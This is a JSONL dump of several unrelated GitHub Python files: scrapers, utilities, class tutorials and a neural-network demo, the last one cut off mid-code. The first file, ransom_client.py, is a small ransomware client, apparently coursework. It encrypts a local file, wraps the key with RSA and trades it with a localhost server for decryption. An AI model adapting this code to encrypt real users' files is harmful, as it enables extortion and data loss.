+{"seq_id":"32539290422","text":"# Cryptography imports for encrypting the keys\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric import padding, rsa\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.fernet import Fernet\n\n# Socket import for using TCP/IP to connect to the server\nimport socket\n\n\"\"\"\nThis file is used to encrypt a file using a symmetric key. The symmetric key is encrypted using the public key of the recipient.\nThe encrypted key is then saved to a file. That key is then used to encrypt a file.\n\"\"\"\n\n# Using Fetnet to generate a token for the key\nsymmetricKey = Fernet.generate_key()\nFernetInstance = Fernet(symmetricKey)\n\n# Opening the public_key to load into memory\nwith open(\"./keys/public_key.key\", \"rb\") as key_file:\n public_key = serialization.load_pem_public_key(\n key_file.read(),\n backend=default_backend()\n )\n\n# Creating an encryptedSymmetricKey with the public_key for encryption\n# using SHA256\nencryptedSymmetricKey = public_key.encrypt(\n symmetricKey,\n padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA256()),\n algorithm=hashes.SHA256(),\n label=None\n )\n)\n\n# Opening or creating the encrypted key file and writing the encryption to\n# it, reading the Fernet Instance and writing the data\nwith open(\"./keys/encryptedSymmertricKey.key\", \"wb\") as key_file:\n key_file.write(encryptedSymmetricKey)\n filePath = \"./ransomware/SecretTextFile.txt\"\n\n with open(filePath, \"rb\") as file:\n file_data = file.read()\n print(file_data)\n encrypted_data = FernetInstance.encrypt(file_data)\n\n with open(filePath, \"wb\") as file:\n file.write(encrypted_data)\n\n\ndef decryptFile(filePath, key):\n FernetInstance = Fernet(key)\n with open(filePath, \"rb\") as d_file:\n file_data = d_file.read()\n decrypted_data = FernetInstance.decrypt(file_data)\n\n with open(\"./ransomware/decryptedTextFile.txt\", \"wb\") as file:\n file.write(decrypted_data)\n\n\ndef sendEncryptedKey(eKeyFilePath):\n with socket.create_connection((\"127.0.0.1\", 8000)) as sock:\n with open(eKeyFilePath, \"rb\") as file:\n file_data = file.read()\n sock.send(file_data)\n decryptedSymmetricKey = sock.recv(1024).strip()\n decryptFile(\"./ransomware/SecretTextFile.txt\",\n decryptedSymmetricKey)\n\n\nsendEncryptedKey(\"./keys/encryptedSymmertricKey.key\")\nquit()\n","repo_name":"LemonSauc3/A1","sub_path":"ransom_client.py","file_name":"ransom_client.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"25669662633","text":"import turtle as tr\r\ntr.shape('turtle')\r\nfrom random import *\r\ntr.speed(0)\r\n\r\ndef sluchaino():\r\n while True:\r\n tr.forward(randint(1, 30))\r\n a = random()\r\n if a >= 0.5:\r\n tr.right(randint(30, 360))\r\n else:\r\n tr.left(randint(30, 360))\r\n\r\n\r\nsluchaino()\r\ntr.exitonclick() ","repo_name":"petersNikolA/turtle2","sub_path":"turtle2,1.py","file_name":"turtle2,1.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"37909418182","text":"from bs4 import BeautifulSoup\nimport urllib.request as urllib2\nfor offset in range(0, 10, 10):\n redditFile = urllib2.urlopen(\n \"https://www.indeed.com/jobs?q=sql&l=United+States&sort=date&radius=25&start=\"+str(offset))\n redditHtml = redditFile.read()\n redditFile.close()\n\n soup = BeautifulSoup(redditHtml, 'html.parser')\n # print(soup)\n jobs = soup.find_all(\"div\", {\"class\": \"jobsearch-SerpJobCard\"})\n\n # print(jobs)\n\n #Title = soup.find_all(\"a\", {\"class\": \"jobtitle turnstileLink\",\"data-tn-element\": \"jobTitle\"})\n #Company = soup.find_all(\"a\", {\"data-tn-element\": \"companyName\"})\n for job in jobs:\n try:\n key = ['title', 'company', 'star', 'date']\n value = [job.find(\"a\", {\"class\": \"jobtitle turnstileLink\", \"data-tn-element\": \"jobTitle\"}\n ).text.strip(), job.find(\"a\", {\"data-tn-element\": \"companyName\"}).text.strip(), job.find(\"span\", {\"class\": \"ratingsContent\"}).text.strip(), job.find(\"span\", {\"class\": \"date\"}).text.strip()]\n # Create a zip object from two lists\n dicobj = zip(key, value)\n # Create a dictionary from zip object\n dictOfWords = dict(dicobj)\n print(dictOfWords)\n except:\n try:\n print(job.find(\"a\", {\"class\": \"jobtitle turnstileLink\", \"data-tn-element\": \"jobTitle\"}\n ).text.strip(), job.find(\"span\", {\"class\": \"company\"}).text.strip(), job.find(\"span\", {\"class\": \"ratingsContent\"}).text.strip(), job.find(\"span\", {\"class\": \"date\"}).text.strip())\n except:\n print(job.find(\"a\", {\"class\": \"jobtitle turnstileLink\", \"data-tn-element\": \"jobTitle\"}\n ).text.strip(), job.find(\"span\", {\"class\": \"company\"}).text.strip(), job.find(\"span\", {\"class\": \"date\"}).text.strip())\n","repo_name":"SudharsanaViswanathan/python","sub_path":"WebScrapingIndeedJobs/test_scripts/indeed.py","file_name":"indeed.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"22553262662","text":"import os, sys\nimport pandas as pd\nimport shutil\nfrom tqdm import tqdm\n\n# 파일에 원하는 정보를 데이터프레임으로 만들기\ndef make_df(dir):\n file_info = []\n for root, dirs, files in os.walk(dir):\n for file in files:\n filename, ext = os.path.splitext(file)\n if ext == '.jpg':\n file_path = os.path.join(root, file)\n filename_split = filename.split('_')\n category = '_'.join(filename_split[:4])\n file_idx = int(filename_split[-1])\n file_info.append([file_path, category, file_idx])\n df = pd.DataFrame(file_info, columns=['filepath', 'category', 'num'])\n\n return df\n\n# 조건에 맞는 파일 추출\ndef file_extract(df, old_df, Category, minidx, maxidx):\n df = df[df['category'] == Category]\n old_df = old_df[old_df['category'] == Category]\n\n for i in range(minidx, maxidx, 3):\n if minidx%3 == 0:\n extract_num = ((((i//3)-1) * 30) + 2) - 1\n else:\n extract_num = ((((i//3)) * 30) + (minidx%3)) - 1\n extract_num1 = extract_num + 10\n extract_num2 = extract_num + 20\n # copyfile(df, extract_num)\n old_file = old_df.loc[old_df['num'] == i, 'filepath']\n if len(old_file.values) > 0: # old db에서 프레임이 끊겨있을 경우 건너뜀\n copyfile(df, extract_num1)\n copyfile(df, extract_num2)\n\n\n# 파일 복사\ndef copyfile(df, num):\n extract_file = df.loc[df['num'] == num, 'filepath']\n extract_file = extract_file.values[0]\n root, file = os.path.split(extract_file)\n folder_name = '_'.join(file.split('_')[:3])\n folder = os.path.join(output_dir, 'new_db', folder_name)\n output_path = os.path.join(folder, file)\n os.makedirs(folder, exist_ok=True)\n shutil.copy2(extract_file, output_path)\n\n \ndef old_file_extract(df, Category, minidx, maxidx):\n df = df[df['category'] == Category]\n for i in range(minidx, maxidx, 3):\n old_file = df.loc[df['num'] == i, 'filepath']\n if len(old_file.values) > 0: # old db에서 프레임이 끊겨있을 경우 건너뜀\n old_file = old_file.values[0]\n root, file = os.path.split(old_file)\n folder_name = '_'.join(file.split('_')[:3])\n filename = '_'.join(file.split('_')[:4])\n if minidx%3 == 0:\n extract_num = ((((i//3)-1) * 30) + 2) - 1\n else:\n extract_num = ((((i//3)) * 30) + (minidx%3)) - 1\n num = str(extract_num).zfill(8)\n frame_filename = f'{filename}_{num}.jpg'\n folder = os.path.join(output_dir, 'old_db', folder_name)\n output_path = os.path.join(folder, frame_filename)\n os.makedirs(folder, exist_ok=True)\n shutil.copy2(old_file, output_path)\n \n_, old_db_dir, new_db_dir, output_dir, mode_num = sys.argv\n\nold_db_df = make_df(old_db_dir)\nnew_db_df = make_df(new_db_dir)\n\ncategory_list = old_db_df['category'].unique()\n\n# 맨 앞 프레임을 무조건 살리는 경우\nif mode_num == '0':\n for category in tqdm(category_list):\n min_idx = old_db_df.loc[old_db_df['category'] == category, 'num'].min()\n max_idx = old_db_df.loc[old_db_df['category'] == category, 'num'].max()\n \n if min_idx%3 == 1:\n file_extract(new_db_df, old_db_df, category, min_idx, max_idx)\n old_file_extract(old_db_df, category, min_idx, max_idx)\n elif min_idx%3 == 2:\n file_extract(new_db_df, old_db_df, category, min_idx, max_idx)\n old_file_extract(old_db_df, category, min_idx, max_idx)\n elif min_idx%3 == 0:\n file_extract(new_db_df, old_db_df, category, min_idx, max_idx)\n old_file_extract(old_db_df, category, min_idx, max_idx)\n \n# 맨 앞 프레임에 조건을 넣을 경우\nelif mode_num == '1': \n for category in tqdm(category_list):\n min_idx = old_db_df.loc[old_db_df['category'] == category, 'num'].min()\n max_idx = old_db_df.loc[old_db_df['category'] == category, 'num'].max()\n \n if min_idx%3 == 1:\n file_extract(new_db_df, old_db_df, category, min_idx, max_idx)\n 
old_file_extract(old_db_df, category, min_idx, max_idx)\n elif min_idx%3 == 2:\n min_idx = min_idx + 2\n file_extract(new_db_df, old_db_df, category, min_idx, max_idx)\n old_file_extract(old_db_df, category, min_idx, max_idx)\n elif min_idx%3 == 0:\n min_idx = min_idx + 1\n file_extract(new_db_df, old_db_df, category, min_idx, max_idx)\n old_file_extract(old_db_df, category, min_idx, max_idx)","repo_name":"tkdalsrb123/Alchera","sub_path":"08/0801_frame_match_extract/frame_match_extract.py","file_name":"frame_match_extract.py","file_ext":"py","file_size_in_byte":4685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"11423635038","text":"import numpy as np\nimport pandas as pd\nimport yfinance as yf\nimport json as js\n\n# Function to pull option information of a stock\ndef option_pull(sym):\n ticker = yf.Ticker(sym)\n list_of_expirations = ticker.options\n\n # dataframe for options\n options = pd.DataFrame()\n\n for entry in list_of_expirations:\n curr_option = ticker.option_chain(entry)\n aggr_option = pd.DataFrame().append(curr_option.calls).append(curr_option.puts)\n aggr_option['expirationDate'] = entry\n options = options.append(aggr_option, ignore_index=True)\n\n return options\n\nprint (option_pull(\"AMD\"))\n\n\n\n\n\n","repo_name":"Anthony3301/Options-Evalutation-Tool","sub_path":"options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"12599076265","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n # 商品购买\n url(r'^product/$', views.product, name=\"product\"),\n url(r'^add/$',views.add,name=\"add\"),\n url(r'^findTypeByPID/$',views.findTypeByPID,name=\"findTypeByPID\"),\n # 购买\n url(r'(?P\\d+)/product/$', views.product, name=\"product\"),\n # 评论\n url(r'(?P\\d+)/pinglun/$', views.pinglun, name=\"pinglun\"),\n # 详情\n url(r'(?P\\d+)/xiangqing/$', views.xiangqing, name=\"xiangqing\"),\n # 分类\n url(r'(?P\\d+)/fenlei/$', views.fenlei, name=\"fenlei\"),\n]","repo_name":"0912TAO/mall1","sub_path":"goods/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"34641998815","text":"class Person:\n def __init__(self, name, money, mood, healthRate):\n self.name = name\n self.money = money\n self.mood = mood\n self.healthRate = healthRate\n\n def eat(self, meals):\n meals = int(meals)\n if meals == 3:\n return \"100% hth\"\n elif meals == 2:\n return \"75% hth\"\n elif meals == 1:\n return \"50% hth\"\n elif meals == 0:\n return \"0% hth\"\n elif meals > 3:\n return \"fat\"\n else:\n return \"wrong input\"\n\n def sleep(self, hours):\n hours = int(hours)\n if hours == 7:\n return \"Happy\"\n elif hours < 7:\n return \"tired\"\n else:\n return \"Lazy\"\n\n def buy(self, items):\n items = int(items)\n self.money += items * 10\n return self.money\n\n @property # print property value\n def healthRate(self):\n return self.__healthRate\n\n @healthRate.setter\n def healthRate(self, helth):\n if helth >= 0 and helth <= 100:\n self.__healthRate = helth\n else:\n print(\"must be between 0 to 100.\")\n","repo_name":"minaemad13/Python_ITI_Lab4","sub_path":"Person.py","file_name":"Person.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"15954356355","text":"#\"我的魔幻宠物\"\n#目的:通过编程创建和自己互动的虚拟宠物,学习类的一些基本概念和用法\n'''现在请发挥你的想象力,把自己想象成一位宠物店的小魔法师,\n 现在你的工作是创造一些讨客人喜欢的魔幻宠物\n 可以是 传说中美丽的独角兽,那一定会让没见过独角兽的客人大吃一惊\n 但在这之前,我们需要学习一些魔法咒语(代码)\n'''\n#1.定义类\n'''首先,包括独角兽在内的所有魔幻宠物都需要先有个模型\n ,然后才能在这个模型的基础上去发挥想象力补充这个模型的具体细节\n 所以这个模型的创建,即类的定义,是十分很重要的\n 在这个过程中,我们需要使用第一条咒语\"class\",然后加上这个类的名称'''\nclass MyMagicPet:\n #2.定义属性\n '''\n 在类的下面给出魔幻宠物的基本属性:可以思考一下你要创建的一大群的宠物\n 会有的共同的特点,都会有名字,年龄等等,这里的答案很多,可以按照你的喜好\n 把它补充得更完整\n '''\n name = \"\"#名字\n age = 0#年龄\n gender = \"\"#性别\n color = \"\"#颜色\n #3.定义方法\n '''\n 接下来我们可以用”函数咒语“来实现我们想要对宠物进行的操作\n 比如选择他们的属性(例如:给他们取名,决定他们的性别),\n 还可以给它们喂食,跟他们玩耍等等'''\n def __init__(self, name, age, gender, color):\n '''\n 这个函数咒语可帮助我们定义一些创造出来的小动物可以改变的属性\n 这个过程也称为初始化(要记得写self)\n '''\n self.name = name\n self.age = age\n self.gender = gender\n self.color = color\n self.physicalCondition = \"健康的\"\n self.mentalCondition = \"快乐的\"\n self.degree = 0\n self.container = 0\n def show_info(self):\n print(f\"{self.name}的年龄是{self.age}岁,性别是{self.gender},颜色是{self.color}\")\n print(f\"状态是{self.physicalCondition}和{self.mentalCondition},等级是{self.degree}\")\n def feed_pet(self):\n '''\n 这是一个喂宠物的函数咒语,\n 根据宠物的健康状态进行不同的操作,\n 喂食成功会改变宠物的状态并升级宠物,\n 喂食失败则输出失败信息\n '''\n if self.physicalCondition == \"健康的\":\n print(\"喂食成功,你的宠物打了一个很响的饱嗝\")\n self.physicalCondition = \"饱食的\"\n self.upgrade_pet()\n elif self.physicalCondition == \"饥饿的\":\n print(\"喂食成功,你的宠物蹭着你的腿表示感谢\")\n self.physicalCondition = \"健康的\"\n self.upgrade_pet()\n else:\n print(\"喂食失败\")\n print(f\"{self.name}现在状态是{self.physicalCondition}\")\n print(\"无法继续获取经验,需要玩耍\")\n if self.mentalCondition == \"疲劳的\":\n self.mentalCondition = \"快乐的\"\n print(f\"{self.name}现在状态是{self.physicalCondition}和{self.mentalCondition}\")\n def play_with_pet(self):\n '''\n 这个函数咒语根据宠物的身心状态决定是否可以和宠物玩耍,\n 并根据结果更新宠物的状态信息。\n\n '''\n if self.physicalCondition != \"饥饿的\" and self.mentalCondition == \"快乐的\":\n print(\"跟他玩耍成功\")\n self.mentalCondition = \"兴奋的\"\n print(f\"{self.name}现在状态是{self.mentalCondition}\")\n self.upgrade_pet()\n elif self.physicalCondition != \"饥饿的\" and self.mentalCondition == \"兴奋的\":\n print(\"跟他玩耍成功\")\n self.mentalCondition = \"疲劳的\"\n self.physicalCondition = \"饥饿的\"\n self.upgrade_pet()\n else:\n print(\"跟他们玩耍失败\")\n print(f\"{self.name}现在状态是{self.mentalCondition}\")\n print(\"无法继续获取经验,需要喂食\")\n print(f\"{self.name}现在的状态是{self.physicalCondition}和{self.mentalCondition}\")\n def roll_over(self):\n '''这是一个简单的让宠物执行翻滚动作的函数咒语'''\n if self.degree >= 2:\n print(\"宠物翻滚成功\")\n self.upgrade_pet()\n else:\n print(\"宠物翻滚失败\")\n print(f\"宠物{self.name}的等级是{self.degree},需要达到2级才能翻滚\")\n def upgrade_pet(self):\n '''这个函数咒语可就厉害了,它能实现我们在游戏中经常看到的角色升级功能\n 那它的操作思路是怎么样的呢\n 1,首先,得用到上面初始化的存储经验的容器self.container\n 在执行一次可以加经验的行为的时候,容器里的经验值加1,\n 2.然后我们给这个容器一个上限:5\n 然后用if咒语来判断容器在加经验后是否满了\n 要是满了,就升一级,同时把容器里的经验清零,\n 然后就能实现这个升级功能啦'''\n self.container = self.container + 1\n print(f\"宠物{self.name}经验值加一,离升下一级还差{5 - self.container}点经验值\")\n if self.container == 5:\n self.degree = self.degree + 1\n print(f\"恭喜你的宠物{self.name}成功升到{self.degree}级\")\n self.container = 0\n\n'''\n class咒语还有另一种作用,叫做\"继承\",就是传承基本的宠物类的各种属性及方法(也就是函数)\n 在继承的过程中,你也可以根据你所希望对宠物进行的操作来进行属性和方法的修改或增加'''\n\nclass Dragon(MyMagicPet):\n def __init__(self, name, age, gender, color,tech):\n super().__init__(name, age, gender, color)\n #子类继承上面的父类,当然可以继承父类的属性和方法,当我们在调用时,还需用到另一条咒语:super()\n #在子类的基础上,我们可以添加一些独特的属性和方法\n self.size = \"大型\"\n self.strength = \"强大\"\n self.speed = \"飞快\"\n self.tech = tech\n def magic_transform(self):\n #这是一个简单的用来换技能的函数咒语,它会根据宠物的等级来判断是否可以进行技能转换\n 
if self.tech == \"技能1\":\n if self.degree <= 4:\n print(\"技能转换失败\")\n print(f\"宠物{self.name}的等级是{self.degree},需要达到5级才能转换\")\n else:\n print(\"技能转换成功\")\n self.tech = \"技能2\"\n print(\"技能转换成功\")\n elif self.tech == \"技能2\":\n self.tech = \"技能1\"\n print(\"技能转换成功\")\n def use_tech(self):\n #当然,既然我们创建的是魔幻宠物,那就得有些其他的的普通宠物没有的特点,\n # 比如,它可以用技能,这是一个用来使用技能的函数咒语,在里边判断宠物所持有的技能\n # 然后根据技能的效果来进行相应的操作\n if self.tech == \"技能1\":\n print(\"技能1使用成功\")\n if self.physicalCondition == \"饥饿的\" or self.mentalCondition == \"疲劳的\":\n print(f\"你的宠物{self.name}向前喷射了一小团小小的火焰,\")\n else:\n print(f\"你的宠物{self.name}向前喷射了一团巨大的火焰\")\n self.physicalCondition = \"饥饿的\"\n self.mentalCondition = \"疲劳的\"\n self.upgrade_pet()\n elif self.tech == \"技能2\":\n print(\"技能2使用成功\")\n if self.physicalCondition == \"饥饿的\" or self.mentalCondition == \"疲劳的\":\n print(f\"你的宠物{self.name}向前刮起了一阵人畜无害的微风\")\n self.upgrade_pet()\n else:\n print(f\"你的宠物{self.name}将会向前刮起一阵毁灭性的龙卷风\")\n choice = input(\"你要继续使用技能吗?(y/n)\")\n if choice == \"y\":\n print(f\"你的宠物{self.name}向前刮起了一阵毁灭性的龙卷风\")\n print(\"很好,在一流魔法师店长的及时的救助下,魔法宠物店有幸没有化为废墟\")\n print(\"所谓大难不死必有后福,在使用了这一强力技能后,你的宠物获得了大量经验\")\n for i in range(10):\n self.upgrade_pet()\n print(f\"现在你的宠物{self.name}的等级是{self.degree}\")\n elif choice == \"n\":\n print(\"你选择了不使用技能\")\n else:\n print(\"你输入了错误的选项,请在“n,y”中选一\")\n\n def show_func(self):\n print(\"我是一个大型的火焰龙,我有着强大的力量,我飞快地移动\")\n print(f\"现在我能使用的技能是{self.tech}\")\nclass Unicorn(MyMagicPet):\n def __init__(self, name, age, gender, color,tech):\n super().__init__(name, age, gender, color)\n self.size = \"中型\"\n self.strength = \"壮实\"\n self.speed = \"飞速\"\n self.tech = tech\n def show_func(self):\n print(\"我是一个中型的独角兽,我有着强大的力量,我飞速地移动\")\n\n#在完成上述的类的定义和继承后,我们就做足施展魔法的准备了,下面请尽情施展魔法吧!\n#比如创建一个Dragon类的对象怎么样?\n\n#比如对它进行操作怎么样?\n\n#比如对它进行升级怎么样?\n\n#再比如,做些更厉害的事,去发挥想象力去补充下独角兽类?\n\n#勇敢地去试试吧!\n\n","repo_name":"hzt200306/pythonProjectsDevelopment","sub_path":"python/06_lzt_MyMagicPet/魔法宠物程序制作.py","file_name":"魔法宠物程序制作.py","file_ext":"py","file_size_in_byte":9907,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
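Following the prompts at the end of the tutorial above, a minimal example of creating a Dragon and exercising it (the name and attribute values are purely illustrative):

    # Dragon needs the extra `tech` argument on top of the base attributes
    dragon = Dragon("小火", 3, "雄性", "红色", "技能1")
    dragon.show_info()       # age, gender, colour, state and level
    dragon.show_func()       # Dragon-specific description plus current skill

    # every successful action calls upgrade_pet(); 5 experience points = 1 level
    dragon.feed_pet()
    dragon.play_with_pet()
    dragon.use_tech()
    print(dragon.degree, dragon.container)   # 0 3 after the three actions above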
+{"seq_id":"10603534739","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport scrapy\nfrom scrapy.pipelines.images import ImagesPipeline\nfrom scrapy.exceptions import DropItem\nimport re\n\nclass MzituPipeline(ImagesPipeline):\n def file_path(self, request, response=None, info=None):\n item = request.meta['item']\n folder = item['name']\n folder_strip = strip(folder)\n image_guid = request.url.split('/')[-1]\n filename = u'{0}/{1}'.format(folder_strip, image_guid) # 路径 只是生成路径\n return filename\n\n\n # 固定写法 多加一个referer 保存图片\n def get_media_requests(self, item, info):\n for img_url in item['image_urls']:\n referer = item['url']\n yield scrapy.Request(img_url, meta={'item': item,\n 'referer': referer})\n\n def item_completed(self, results, item, info):\n image_paths = [x['path'] for ok, x in results if ok]\n if not image_paths:\n raise DropItem(\"Item contains no images\")\n return item\n\n\ndef strip(path):\n path = re.sub(r'[?\\\\*|“<>:/]', '', str(path))\n return path\n\n\nif __name__ == \"__main__\":\n a = '我是一个?\\*|“<>:/错误的字符串'\n print(strip(a))","repo_name":"pol9111/mzitu","sub_path":"mzitu/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"18689610220","text":"import os, sys\nimport zipfile\n\ndef statlog(s):\n print(\" -- %s\" % s)\n \nclass JAJFile:\n def __init__(self, jaj_filepath):\n if not zipfile.is_zipfile(jaj_filepath):\n raise Exception(\"I need a zipfile\")\n \n self.filepath = jaj_filepath\n self.filename = os.path.split(jaj_filepath)[0]\n self.zf = zipfile.ZipFile(jaj_filepath, 'r')\n\n self.background_pdf_filename = None\n self.background_pdf_filepath = None\n self.dc_svg_annotation = {}\n self.ls_extract = []\n self.dir_tmp = None\n\n for info in self.zf.infolist():\n if info.filename.startswith(\"background\") and info.filename.endswith(\".pdf\"):\n self.background_pdf_filename = info.filename\n self.ls_extract.append(info.filename)\n # jarnal annotations have format \"p%d.svg\" and start from 0\n if info.filename.startswith('p') and info.filename.endswith('.svg'):\n svg_page_num = int(os.path.splitext(info.filename[1:])[0])\n # cache the svgs in the annotation directory\n self.dc_svg_annotation[svg_page_num] = info.filename\n self.ls_extract.append(info.filename)\n \n if self.background_pdf_filename is None:\n raise Exception(\"did not did not find any pdfs in the jaj\")\n \n def extract_to_directory(self, output_directory):\n if not os.path.exists(output_directory):\n os.mkdir(output_directory)\n self.dir_tmp = output_directory\n for filename in self.ls_extract:\n extract_path = os.path.join(output_directory, filename)\n open(extract_path, 'wb').write(self.zf.read(filename))\n #statlog('extracted %s' % filename)\n\n self.background_pdf_filepath = os.path.join(output_directory, self.background_pdf_filename)\n \n def cleanup(self):\n if not self.dir_tmp: return\n for filename in self.ls_extract:\n print(\"~ jaj %s\" % filename)\n os.unlink(os.path.join(self.dir_tmp, filename))\n os.rmdir(self.dir_tmp)\n \n # old stuff from another class that did something similar, possibly\n # redundant. shoehorned to fit here, may not work\n def deflate(self):\n if not self.dir_tmp:\n self.dir_tmp = \"%s.dir\" % self.filename\n CWD = os.getcwd()\n os.mkdir(self.dir_tmp)\n os.chdir(self.dir_tmp)\n \n # extract into dir_tmp\n for info in self.zf.infolist():\n with open(info.filename, \"w\") as ofile:\n ofile.write(self.zf.read(info.filename))\n\n os.chdir(CWD)\n \n def inflate(self, remove_temp = True):\n if not self.dir_tmp:\n self.deflate()\n\n CWD = os.getcwd()\n os.chdir(self.dir_tmp)\n\n ls_archive_file = os.listdir('.')\n print(\"creating archive...\")\n zofile = zipfile.ZipFile(self.filename, mode='w')\n try:\n for filename in ls_archive_file:\n zofile.write(filename)\n finally:\n print(\"archive successfully created\")\n zofile.close()\n\n os.chdir(CWD)\n \n if remove_temp:\n os.rename(os.path.join(self.dir_tmp, self.filename), os.path.join(CWD, self.filename))\n shutil.rmtree(self.dir_tmp)\n self.dir_tmp = None\n \n\n","repo_name":"whacked/BeanBunny","sub_path":"BeanBunny/io/JarnalFile.py","file_name":"JarnalFile.py","file_ext":"py","file_size_in_byte":3376,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"70732230567","text":"# simple neuron using complex numbers for weights and input\n# to learn the XOR problem, must use 2 periods, ie, dividing the circle into 2 sections so opposite angles have the same category\n# The ideas are based from the link below, which I modified based on my understanding of how the neuron behaves\n# I've extended this to include visualization of the neural activity\n# https://github.com/makeyourownneuralnetwork/complex_valued_neuralnetwork/blob/master/single_neuron-periodic.ipynb\n# http://makeyourownneuralnetwork.blogspot.com/2016/05/complex-valued-neural-networks.html\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport numpy as np\nimport math\nimport copy\n\n# initialize visualization\nfig, ax = plt.subplots(figsize=(8, 5), subplot_kw=dict(aspect=\"equal\", adjustable='datalim', anchor='C'))\n# ax.set_xlim((-4,4))\n# ax.set_ylim((-4,4))\nfig.set_dpi(100)\nclass ComplexNeuron():\n def __init__(self, inputn, cat, periods):\n self.input_num = inputn\n self.categories = cat\n self.periods = periods\n self.tc_passed = 0\n\n # link weights matrix\n self.w = np.random.normal(0.0, 1.0, (inputn + 1))\n self.w = np.array(self.w, ndmin=2, dtype='complex128')\n self.w += 1j * np.random.normal(0.0, 1.0, (inputn + 1))\n print ('Weights: ', self.w)\n self.out = {}\n self.map_out()\n print ('Out Mapping: ',self.out)\n\n def map_out(self):\n sections = self.categories * self.periods\n angle = 2 * np.pi / sections\n h_angle = angle / 2\n # angle + π to get the oposite angle\n for i in range(1, self.categories+1):\n out_dict = {}\n o_angle = angle * i\n t_angle = o_angle - h_angle\n\n out_dict['angle'] = [o_angle]\n out_dict['target'] = [t_angle]\n if self.periods == 2:\n for j in range(1, self.periods):\n out_dict['angle'].append(o_angle + np.pi)\n out_dict['target'].append(t_angle + np.pi)\n\n self.out[i-1] = out_dict\n self.out[i-1] = out_dict\n\n # create Pie to represent neuron\n data = np.ones(4)\n labels = ['False', 'True'] * 2\n patches, texts, autotexts = ax.pie(data, autopct=lambda pct: int(pct * sum(data)/100), \n labels=labels, textprops=dict(color=\"w\"))\n \n # set Pie legends Title and loc\n ax.legend(patches, labels,\n title=\"Truth Values\",\n loc=\"center left\",\n bbox_to_anchor=(0.8, 0, 0.5, 1))\n\n # Set Legends color and Texts\n legnds = ax.get_legend()\n for i in range(sections):\n patches[i-1].set_alpha(0.7)\n if i%2 == 0:\n autotexts[i].set_text('0')\n patches[i].set_color('#0cff0c')\n legnds.legendHandles[i].set_color('#0cff0c')\n else:\n patches[i].set_color('#0165fc')\n legnds.legendHandles[i].set_color('#0165fc')\n\n ax.set_title(\"Single Neuron:\\nSolving XOR Problem\")\n plt.setp(autotexts, size=8, weight=\"bold\")\n \n def map_z(self, z):\n z = np.angle(z)\n while z < 0:\n z += 2 * np.pi\n\n print ('Angle: ', z)\n for i in range(self.periods):\n for j in range(self.categories):\n if z < self.out[j]['angle'][i]:\n return j, i\n\n def query(self, in_list, visual=False):\n print ('++++++++++++++++ Q U E R Y ++++++++++++++++')\n in_arr = copy.deepcopy(in_list)\n in_arr.append(1.0)\n input = np.array(in_arr, ndmin=2, dtype='complex128')\n print ('Input: ',input)\n z = np.dot(input, self.w.T)[0]\n print ('Z: ',z)\n o, q = self.map_z(z)\n print ('Output: ',o)\n return z, (o, q)\n \n def train(self, in_list, target, visual=False):\n print ('++++++++++++++++ T R A I N ++++++++++++++++')\n in_arr = copy.deepcopy(in_list)\n in_arr.append(1.0)\n input = np.array(in_arr, ndmin=2, dtype='complex128')\n print ('Input: 
',input)\n z = np.dot(input, self.w.T)[0]\n print ('Z: ',z)\n o, q = self.map_z(z)\n print ('Output: ',o)\n # if o == target:\n # self.tc_passed += 1\n # return z\n\n print ('Modify weights!')\n t_angle = np.array(self.out[target]['target'])\n print ('Target Angles: ', t_angle)\n #t_angle_2complex = complex(np.cos(t_angle) + 1j*np.sin(t_angle))\n\n errors = np.exp(1j * t_angle) - z\n #print ('Errors: ', errors)\n e = errors[np.argmin(np.abs(errors))]\n print ('Error: ', e)\n dw = e * input / 3\n self.w += dw\n print ('Weights: ',self.w)\n \n #query after weight adjustment\n # z1, _ = self.query(in_list[:2])\n # o1, _ = self.map_z(z1)\n # if o1 == target:\n # self.tc_passed += 1\n \n return z, (o, q)\n \n def reset_tc_passed(self):\n self.tc_passed = 0\n\ndef visualize(angle, q, offset=1):\n x = np.cos(angle)\n y = np.sin(angle)\n #ax.scatter(x,y, facecolor='red')\n # xtxt = -1.7\n # ytxt = 1.2 * offset\n xtxt = 0\n ytxt = 0\n offset *= 0.25\n if q[1] == 1: # bottom half of circle\n ytxt = y - offset\n if q[0] == 0:\n xtxt = x - offset\n else:\n xtxt = x + offset\n else: # top half of circle\n ytxt = y + offset\n if q[0] == 1:\n xtxt = x - (offset + 0.25)\n else:\n xtxt = x + offset\n return (x,y), (xtxt, ytxt)\n\n# Initialize neural network\nn_in = 2\ncat = 2\nper = 2\nnn = ComplexNeuron(n_in, cat, per)\n\n# define arrow annotations for raw and learned angle\narrowprops = dict(arrowstyle=\"-|>\",\n color='black',\n 